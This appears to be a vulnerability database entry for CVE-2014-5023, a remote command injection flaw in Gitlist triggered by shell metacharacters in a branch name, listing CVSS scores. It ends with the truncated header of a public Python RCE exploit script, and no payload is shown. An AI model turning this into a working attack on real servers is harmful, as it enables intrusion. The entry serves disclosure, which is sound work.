6.8
CVSSv2

CVE-2014-5023

Published: 22/07/2014 Updated: 22/07/2014
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Repository.php in Gitter, as used in Gitlist, allows remote attackers with commit privileges to execute arbitrary commands via shell metacharacters in a branch name, as demonstrated by a "git checkout -b" command.

Vulnerable Product Search on Vulmon Subscribe to Product

gitlist gitlist -

Exploits

from commands import getoutput import urllib import sys """ Exploit Title: Gitlist <= 040 anonymous RCE Date: 06/20/2014 Author: drone (@dronesec) Vendor Homepage: gitlistorg/ Software link: s3amazonawscom/gitlist/gitlist-040targz Version: <= 040 Fixed in: 050 Tested on: Debian 7 More information: hatriot ...